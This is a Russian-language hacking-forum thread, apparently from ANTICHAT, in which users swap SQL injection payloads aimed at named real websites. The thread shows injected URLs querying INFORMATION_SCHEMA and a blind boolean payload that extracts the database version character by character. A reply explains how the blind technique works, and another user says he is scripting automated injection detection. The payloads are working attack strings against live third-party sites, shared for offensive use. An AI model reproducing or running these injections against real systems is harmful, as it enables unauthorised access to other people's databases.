ANTICHAT — форум по информационной безопасности, OSINT и технологиям

тоха респект тебе)

http://link.raid.ru/browse.php?cat=-1+SELECT TABLE_SCHEMA,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS/*

Forbidden
You don't have permission to access /browse.php on this server.

Хотя user(),database(),version() выполняются

Ты че издеваешься? INFORMATION_SCHEMA ?

http://securityvulns.ru/Fnews675.html читай если нет (если да... то хм..)

тьфу блин тупею...

Там мукул четвертый, information_schema там нет.

http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid =2+and+ascii(lower(substring((select+version( )),1,1)))=0x35/*
можно ли этим способом вывести строчку или какой нить символ чтобы можно было увидеть инъекцию?

Там мукул четвертый, скорее всего information_schema там нет.

гыгыгыг, ога, information_schema это такая непостоянная фигня, где заочет там и появляется, обычно она в пятой версии но иногда и в 4, хотя скорее всего там нет
пиздец!

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

2 bag
Я не пойму о каких сиволах ты уже 3 страницы спрашиваешь ?
ascii(lower(substring((select+version( )),1,1)))=0x35/*
Этот запрос показывает первый символ в версии базы если страница отобразилась то выражение верно в данном случае 1 символ=5(0x35)
Идентификация иньекции происходит не по выводу символов, почитай пожалуйста статьи

jokester, спасибо за ответ, статьи читал, пишу скрипт, вывожу текст на страницу потом ищу его если есть то все ок, вот пытаюсь воткнуть как в этом методе это можно реализовать